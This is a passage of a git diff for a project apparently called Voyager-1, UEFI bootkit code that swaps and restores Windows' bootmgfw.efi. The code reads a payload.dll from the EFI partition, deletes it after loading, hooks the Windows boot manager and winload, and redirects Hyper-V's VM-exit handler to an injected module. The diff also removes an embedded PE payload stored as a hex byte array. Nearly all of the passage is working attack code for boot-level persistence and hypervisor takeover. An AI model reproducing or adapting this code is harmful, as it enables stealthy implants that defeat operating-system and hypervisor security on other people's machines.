0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0xFF, 0xFF, - 0x00, 0x00, 0x00, 0x00, 0x32, 0x50, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, - 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x50, 0x00, 0x00, - 0x2C, 0x50, 0x00, 0x00, 0x30, 0x50, 0x00, 0x00, 0x00, 0x30, 0x00, 0x00, - 0x46, 0x50, 0x00, 0x00, 0x00, 0x00, 0x54, 0x68, 0x65, 0x47, 0x6F, 0x6C, - 0x64, 0x65, 0x6E, 0x52, 0x65, 0x63, 0x6F, 0x72, 0x64, 0x2E, 0x64, 0x6C, - 0x6C, 0x00, 0x3F, 0x76, 0x6F, 0x79, 0x61, 0x67, 0x65, 0x72, 0x5F, 0x63, - 0x6F, 0x6E, 0x74, 0x65, 0x78, 0x74, 0x40, 0x40, 0x33, 0x55, 0x5F, 0x56, - 0x4F, 0x59, 0x41, 0x47, 0x45, 0x52, 0x5F, 0x44, 0x41, 0x54, 0x41, 0x5F, - 0x54, 0x40, 0x40, 0x41, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 -}; \ No newline at end of file + EFI_STATUS Result = EFI_SUCCESS; + UINTN HandleCount = NULL; + EFI_HANDLE* Handles = NULL; + EFI_FILE_HANDLE VolumeHandle; + EFI_FILE_HANDLE PayLoadFileHandle; + EFI_DEVICE_PATH* PayLoadDevicePath = NULL; + EFI_FILE_IO_INTERFACE* FileSystem = NULL; + EFI_FILE_PROTOCOL* PayLoadFile = NULL; + + if (EFI_ERROR((Result = gBS->LocateHandleBuffer(ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &HandleCount, &Handles)))) + { + Print(L"error getting file system handles -> 0x%p\n", Result); + return Result; + } + + for (UINT32 Idx = 0u; Idx < HandleCount; ++Idx) + { + if (EFI_ERROR((Result = gBS->OpenProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, (VOID**)&FileSystem, gImageHandle, NULL, EFI_OPEN_PROTOCOL_GET_PROTOCOL)))) + { + Print(L"error opening protocol -> 0x%p\n", Result); + return Result; + } + + if (EFI_ERROR((Result = FileSystem->OpenVolume(FileSystem, &VolumeHandle)))) + { + Print(L"error opening file system -> 0x%p\n", Result); + return Result; + } + + if (!EFI_ERROR((Result = VolumeHandle->Open(VolumeHandle, &PayLoadFileHandle, PAYLOAD_PATH, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY)))) + { + VolumeHandle->Close(VolumeHandle); + PayLoadDevicePath = FileDevicePath(Handles[Idx], PAYLOAD_PATH); + + if (EFI_ERROR((Result = EfiOpenFileByDevicePath(&PayLoadDevicePath, &PayLoadFile, EFI_FILE_MODE_WRITE | EFI_FILE_MODE_READ, NULL)))) + { + Print(L"failed to open payload file... reason -> %r\n", Result); + return Result; + } + + EFI_FILE_INFO* FileInfoPtr = NULL; + UINTN FileInfoSize = NULL; + + if (EFI_ERROR((Result = PayLoadFile->GetInfo(PayLoadFile, &gEfiFileInfoGuid, &FileInfoSize, NULL)))) + { + if (Result == EFI_BUFFER_TOO_SMALL) + { + gBS->AllocatePool(EfiBootServicesData, FileInfoSize, &FileInfoPtr); + if (EFI_ERROR(Result = PayLoadFile->GetInfo(PayLoadFile, &gEfiFileInfoGuid, &FileInfoSize, FileInfoPtr))) + { + Print(L"get backup file information failed... reason -> %r\n", Result); + return Result; + } + } + else + { + Print(L"Failed to get file information... reason -> %r\n", Result); + return Result; + } + } + + VOID* PayLoadBuffer = NULL; + UINTN PayLoadSize = FileInfoPtr->FileSize; + gBS->AllocatePool(EfiBootServicesData, FileInfoPtr->FileSize, &PayLoadBuffer); + + if (EFI_ERROR((Result = PayLoadFile->Read(PayLoadFile, &PayLoadSize, PayLoadBuffer)))) + { + Print(L"Failed to read payload file into buffer... reason -> %r\n", Result); + return Result; + } + + if (EFI_ERROR((Result = PayLoadFile->Delete(PayLoadFile)))) + { + Print(L"unable to delete payload file... reason -> %r\n", Result); + return Result; + } + + *PayLoadBufferPtr = PayLoadBuffer; + gBS->FreePool(FileInfoPtr); + return EFI_SUCCESS; + } + } + + Print(L"unable to find payload on disk...\n"); + return EFI_ABORTED; +} \ No newline at end of file diff --git a/Voyager-1/Voyager-1 (1703-1511)/PayLoad.h b/Voyager-1/Voyager-1 (1703-1511)/PayLoad.h index 1430a93..2bf1bd8 100644 --- a/Voyager-1/Voyager-1 (1703-1511)/PayLoad.h +++ b/Voyager-1/Voyager-1 (1703-1511)/PayLoad.h @@ -1,17 +1,22 @@ #pragma once #include "Utils.h" -extern unsigned char PayLoad[3072]; +#include +extern VOID* PayLoad; #pragma pack(push, 1) -typedef struct _voyager_t +typedef struct _VOYAGER_T { UINT64 VmExitHandlerRva; UINT64 HypervModuleBase; UINT64 HypervModuleSize; UINT64 ModuleBase; UINT64 ModuleSize; -} voyager_t, * pvoyager_t; +} VOYAGER_T, * PVOYAGER_T; #pragma pack(pop) +#define WINDOWS_BOOTMGFW_PATH L"\\efi\\microsoft\\boot\\bootmgfw.efi" +#define PAYLOAD_PATH L"\\efi\\microsoft\\boot\\payload.dll" + UINT32 PayLoadSize(VOID); +EFI_STATUS LoadPayLoadFromDisk(VOID** PayLoadBufferPtr); VOID* PayLoadEntry(VOID* ModuleBase); \ No newline at end of file diff --git a/Voyager-1/Voyager-1 (1703-1511)/UefiMain.c b/Voyager-1/Voyager-1 (1703-1511)/UefiMain.c index 23bafae..29d9918 100644 --- a/Voyager-1/Voyager-1 (1703-1511)/UefiMain.c +++ b/Voyager-1/Voyager-1 (1703-1511)/UefiMain.c @@ -1,40 +1,62 @@ #include "BootMgfw.h" #include "SplashScreen.h" -CHAR8* gEfiCallerBaseName = "Voyager"; +CHAR8* gEfiCallerBaseName = "Voyager 1"; const UINT32 _gUefiDriverRevision = 0x200; -EFI_STATUS EFIAPI UefiUnload( - IN EFI_HANDLE ImageHandle -) -{ return EFI_SUCCESS; } +EFI_STATUS EFIAPI UefiUnload(EFI_HANDLE ImageHandle) +{ + return EFI_SUCCESS; +} -EFI_STATUS EFIAPI UefiMain -( - IN EFI_HANDLE ImageHandle, - IN EFI_SYSTEM_TABLE* SystemTable -) +EFI_STATUS EFIAPI UefiMain(EFI_HANDLE ImageHandle, EFI_SYSTEM_TABLE* SystemTable) { EFI_STATUS Result; - EFI_DEVICE_PATH_PROTOCOL* BootMgfwPath; + EFI_HANDLE BootMgfwHandle; gST->ConOut->ClearScreen(gST->ConOut); gST->ConOut->OutputString(gST->ConOut, AsciiArt); Print(L"\n"); + // since we replaced bootmgfw on disk, we are going to need to restore the image back + // this is simply just moving bootmgfw.efi.backup to bootmgfw.efi... if (EFI_ERROR((Result = RestoreBootMgfw()))) { Print(L"unable to restore bootmgfw... reason -> %r\n", Result); + gBS->Stall(5 * 1000000); + return Result; + } + + // the payload is sitting on disk... we are going to load it into memory... + if (EFI_ERROR((Result = LoadPayLoadFromDisk(&PayLoad)))) + { + Print(L"failed to read payload from disk... reason -> %r\n", Result); + gBS->Stall(5 * 1000000); return Result; } - if (EFI_ERROR((Result = InstallBootMgfwHooks(ImageHandle)))) + EFI_DEVICE_PATH* BootMgfwPath = GetBootMgfwPath(); + if (EFI_ERROR((Result = gBS->LoadImage(TRUE, ImageHandle, BootMgfwPath, NULL, NULL, &BootMgfwHandle)))) + { + Print(L"failed to load bootmgfw.efi...\n"); + gBS->Stall(5 * 1000000); + return EFI_ABORTED; + } + + if (EFI_ERROR((Result = InstallBootMgfwHooks(BootMgfwHandle)))) { Print(L"Failed to install bootmgfw hooks... reason -> %r\n", Result); + gBS->Stall(5 * 1000000); return Result; } - Print(L"Hooks installed... returning execution back to BootMgfw...\n"); + if (EFI_ERROR(gBS->StartImage(BootMgfwHandle, NULL, NULL))) + { + Print(L"Failed to start bootmgfw.efi...\n"); + gBS->Stall(5 * 1000000); + return EFI_ABORTED; + } + gBS->Stall(5 * 1000000); return EFI_SUCCESS; } \ No newline at end of file diff --git a/Voyager-1/Voyager-1 (1703-1511)/WinLoad.c b/Voyager-1/Voyager-1 (1703-1511)/WinLoad.c index a717e40..9488556 100644 --- a/Voyager-1/Voyager-1 (1703-1511)/WinLoad.c +++ b/Voyager-1/Voyager-1 (1703-1511)/WinLoad.c @@ -35,12 +35,6 @@ EFI_STATUS EFIAPI BlImgLoadPEImageEx(VOID* a1, VOID* a2, CHAR16* ImagePath, UINT ALLOCATE_IMAGE_BUFFER_MASK ); - if (!LoadImage || !AllocImage) - { - DBG_PRINT("Signatures FAILED!\n"); - return Result; - } - #if WINVER == 1703 MakeShitHook(&HvLoadImageBufferHook, RESOLVE_RVA(LoadImage, 5, 1), &HvBlImgLoadPEImageFromSourceBuffer, TRUE); #elif WINVER <= 1607 // 1511 is the same... diff --git a/Voyager-1/Voyager-1 (2004-1709)/BootMgfw.c b/Voyager-1/Voyager-1 (2004-1709)/BootMgfw.c index 361a417..41cf541 100644 --- a/Voyager-1/Voyager-1 (2004-1709)/BootMgfw.c +++ b/Voyager-1/Voyager-1 (2004-1709)/BootMgfw.c @@ -131,6 +131,49 @@ EFI_STATUS EFIAPI RestoreBootMgfw(VOID) return EFI_ABORTED; } +EFI_DEVICE_PATH* EFIAPI GetBootMgfwPath(VOID) +{ + UINTN HandleCount = NULL; + EFI_STATUS Result; + EFI_HANDLE* Handles = NULL; + EFI_DEVICE_PATH* DevicePath = NULL; + EFI_FILE_HANDLE VolumeHandle; + EFI_FILE_HANDLE BootMgfwHandle; + EFI_FILE_IO_INTERFACE* FileSystem = NULL; + + if (EFI_ERROR((Result = gBS->LocateHandleBuffer(ByProtocol, &gEfiSimpleFileSystemProtocolGuid, NULL, &HandleCount, &Handles)))) + { + Print(L"error getting file system handles -> 0x%p\n", Result); + return DevicePath; + } + + for (UINT32 Idx = 0u; Idx < HandleCount && !FileSystem; ++Idx) + { + if (EFI_ERROR((Result = gBS->OpenProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, (VOID**)&FileSystem, gImageHandle, NULL, EFI_OPEN_PROTOCOL_GET_PROTOCOL)))) + { + Print(L"error opening protocol -> 0x%p\n", Result); + return DevicePath; + } + + if (EFI_ERROR((Result = FileSystem->OpenVolume(FileSystem, &VolumeHandle)))) + { + Print(L"error opening file system -> 0x%p\n", Result); + return DevicePath; + } + + if (!EFI_ERROR(VolumeHandle->Open(VolumeHandle, &BootMgfwHandle, WINDOWS_BOOTMGFW_PATH, EFI_FILE_MODE_READ, EFI_FILE_READ_ONLY))) + DevicePath = FileDevicePath(Handles[Idx], WINDOWS_BOOTMGFW_PATH); + + VolumeHandle->Close(BootMgfwHandle); + if (EFI_ERROR((Result = gBS->CloseProtocol(Handles[Idx], &gEfiSimpleFileSystemProtocolGuid, gImageHandle, NULL)))) + { + Print(L"error closing protocol -> 0x%p\n", Result); + return DevicePath; + } + } + return DevicePath; +} + EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath) { EFI_STATUS Result = EFI_SUCCESS; @@ -149,9 +192,6 @@ EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath) START_BOOT_APPLICATION_MASK ); - if (!ArchStartBootApplication) - return EFI_ABORTED; - Print(L"BootMgfw.ArchStartBootApplication -> 0x%p\n", ArchStartBootApplication); MakeShitHook(&BootMgfwShitHook, ArchStartBootApplication, &ArchStartBootApplicationHook, TRUE); return Result; @@ -172,6 +212,7 @@ EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, gST->ConOut->ClearScreen(gST->ConOut); gST->ConOut->OutputString(gST->ConOut, AsciiArt); Print(L"\n"); + Print(L"Hyper-V PayLoad Size -> 0x%x\n", PayLoadSize()); Print(L"winload.BlLdrLoadImage -> 0x%p\n", LdrLoadImage); Print(L"winload.BlImgAllocateImageBuffer -> 0x%p\n", ImgAllocateImageBuffer); diff --git a/Voyager-1/Voyager-1 (2004-1709)/BootMgfw.h b/Voyager-1/Voyager-1 (2004-1709)/BootMgfw.h index 3c9b4f3..063b5ee 100644 --- a/Voyager-1/Voyager-1 (2004-1709)/BootMgfw.h +++ b/Voyager-1/Voyager-1 (2004-1709)/BootMgfw.h @@ -27,10 +27,12 @@ static_assert(sizeof(START_BOOT_APPLICATION_SIG) == sizeof(START_BOOT_APPLICATION_MASK), "signature and mask size's dont match..."); #define WINDOWS_BOOTMGFW_PATH L"\\efi\\microsoft\\boot\\bootmgfw.efi" +#define PAYLOAD_PATH L"\\efi\\microsoft\\boot\\payload.dll" #define WINDOWS_BOOTMGFW_BACKUP_PATH L"\\efi\\microsoft\\boot\\bootmgfw.efi.backup" extern SHITHOOK BootMgfwShitHook; typedef EFI_STATUS(EFIAPI* IMG_ARCH_START_BOOT_APPLICATION)(VOID*, VOID*, UINT32, UINT8, VOID*); EFI_STATUS EFIAPI RestoreBootMgfw(VOID); +EFI_DEVICE_PATH* EFIAPI GetBootMgfwPath(VOID); EFI_STATUS EFIAPI InstallBootMgfwHooks(EFI_HANDLE BootMgfwPath); EFI_STATUS EFIAPI ArchStartBootApplicationHook(VOID* AppEntry, VOID* ImageBase, UINT32 ImageSize, UINT8 BootOption, VOID* ReturnArgs); diff --git a/Voyager-1/Voyager-1 (2004-1709)/Hvix64.c b/Voyager-1/Voyager-1 (2004-1709)/Hvix64.c index 27bbba9..cc2c0d3 100644 --- a/Voyager-1/Voyager-1 (2004-1709)/Hvix64.c +++ b/Voyager-1/Voyager-1 (2004-1709)/Hvix64.c @@ -1,6 +1,6 @@ #include "Hvix64.h" -VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase) +VOID* MapModule(PVOYAGER_T VoyagerData, UINT8* ImageBase) { if (!VoyagerData || !ImageBase) return NULL; @@ -44,7 +44,7 @@ VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase) { if (AsciiStrStr(VoyagerData->ModuleBase + Name[i], "voyager_context")) { - *(voyager_t*)(VoyagerData->ModuleBase + Address[Ordinal[i]]) = *VoyagerData; + *(VOYAGER_T*)(VoyagerData->ModuleBase + Address[Ordinal[i]]) = *VoyagerData; break; // DO NOT REMOVE? #Stink Code 2020... } } @@ -91,7 +91,7 @@ VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase) VOID MakeVoyagerData ( - pvoyager_t VoyagerData, + PVOYAGER_T VoyagerData, VOID* HypervAlloc, UINT64 HypervAllocSize, VOID* PayLoadBase, @@ -140,9 +140,6 @@ VOID* HookVmExit(VOID* HypervBase, VOID* HypervSize, VOID* VmExitHook) VMEXIT_HANDLER_MASK ); - if (!VmExitHandler) - return NULL; - /* .text:FFFFF80000237436 mov rcx, [rsp+arg_18] ; rcx = pointer to stack that contians all register values .text:FFFFF8000023743B mov rdx, [rsp+arg_28] diff --git a/Voyager-1/Voyager-1 (2004-1709)/Hvix64.h b/Voyager-1/Voyager-1 (2004-1709)/Hvix64.h index 0eed407..697b5e4 100644 --- a/Voyager-1/Voyager-1 (2004-1709)/Hvix64.h +++ b/Voyager-1/Voyager-1 (2004-1709)/Hvix64.h @@ -31,7 +31,7 @@ static_assert(sizeof(VMEXIT_HANDLER_SIG) == 26, "signature is invalid length!"); // AllocBase is the base address of the extra memory allocated below where hyper-v is // AllocSize is the size of the extra allocated memory... This size == module size... // -VOID* MapModule(pvoyager_t VoyagerData, UINT8* ImageBase); +VOID* MapModule(PVOYAGER_T VoyagerData, UINT8* ImageBase); // // sig scan hv.exe for vmexit call and replace the relative call (RVA) with @@ -46,7 +46,7 @@ VOID* HookVmExit(VOID* HypervBase, VOID* HypervSize, VOID* VmExitHook); // VOID MakeVoyagerData ( - pvoyager_t VoyagerData, + PVOYAGER_T VoyagerData, VOID* HypervAlloc, UINT64 HypervAllocSize, VOID* PayLoadBase, diff --git a/Voyager-1/Voyager-1 (2004-1709)/PayLoad.c b/Voyager-1/Voyager-1 (2004-1709)/PayLoad.c index 1a6777f..5e277a8 100644 --- a/Voyager-1/Voyager-1 (2004-1709)/PayLoad.c +++ b/Voyager-1/Voyager-1 (2004-1709)/PayLoad.c @@ -1,5 +1,9 @@ #include "PayLoad.h" +// this can also just be set at compile time if you want too, but for PoC im going +// to read the payload from disk and delete it after... +VOID* PayLoad = NULL; + UINT32 PayLoadSize(VOID) { EFI_IMAGE_DOS_HEADER* RecordDosImageHeader = PayLoad; @@ -26,262 +30,91 @@ VOID* PayLoadEntry(VOID* ModuleBase) return (UINT64)ModuleBase + RecordNtHeaders->OptionalHeader.AddressOfEntryPoint; } -unsigned char PayLoad[3072] = +EFI_STATUS LoadPayLoadFromDisk(VOID** PayLoadBufferPtr) { - 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, - 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0xB8, 0x00, 0x00, 0x00, 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, - 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, - 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F, - 0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20, - 0x44, 0x4F, 0x53, 0x20, 0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A, - 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x2F, 0xBF, 0x31, 0xDD, - 0x6B, 0xDE, 0x5F, 0x8E, 0x6B, 0xDE, 0x5F, 0x8E, 0x6B, 0xDE, 0x5F, 0x8E, - 0xDC, 0xAF, 0x5A, 0x8F, 0x6A, 0xDE, 0x5F, 0x8E, 0xDC, 0xAF, 0x5F, 0x8F, - 0x6A, 0xDE, 0x5F, 0x8E, 0xDC, 0xAF, 0x5D, 0x8F, 0x6A, 0xDE, 0x5F, 0x8E, - 0x52, 0x69, 0x63, 0x68, 0x6B, 0xDE, 0x5F, 0x8E, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x50, 0x45, 0x00, 0x00, 0x64, 0x86, 0x05, 0x00, - 0x00, 0x91, 0x77, 0x5F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0xF0, 0x00, 0x22, 0x20, 0x0B, 0x02, 0x0E, 0x1B, 0x00, 0x02, 0x00, 0x00, - 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, - 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00, - 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, - 0x0A, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x60, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x60, 0x2D, 0x00, 0x00, - 0x01, 0x00, 0x60, 0x01, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, - 0x60, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, - 0x0C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, - 0x38, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x2E, 0x74, 0x65, 0x78, 0x74, 0x00, 0x00, 0x00, - 0xA2, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, - 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x68, 0x2E, 0x72, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x20, 0x01, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, - 0x00, 0x02, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, - 0x2E, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, - 0x00, 0x30, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x40, 0x00, 0x00, 0xC8, 0x2E, 0x70, 0x64, 0x61, 0x74, 0x61, 0x00, 0x00, - 0x0C, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, - 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x48, 0x2E, 0x65, 0x64, 0x61, - 0x74, 0x61, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x00, 0x50, 0x00, 0x00, - 0x00, 0x02, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x40, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x00, 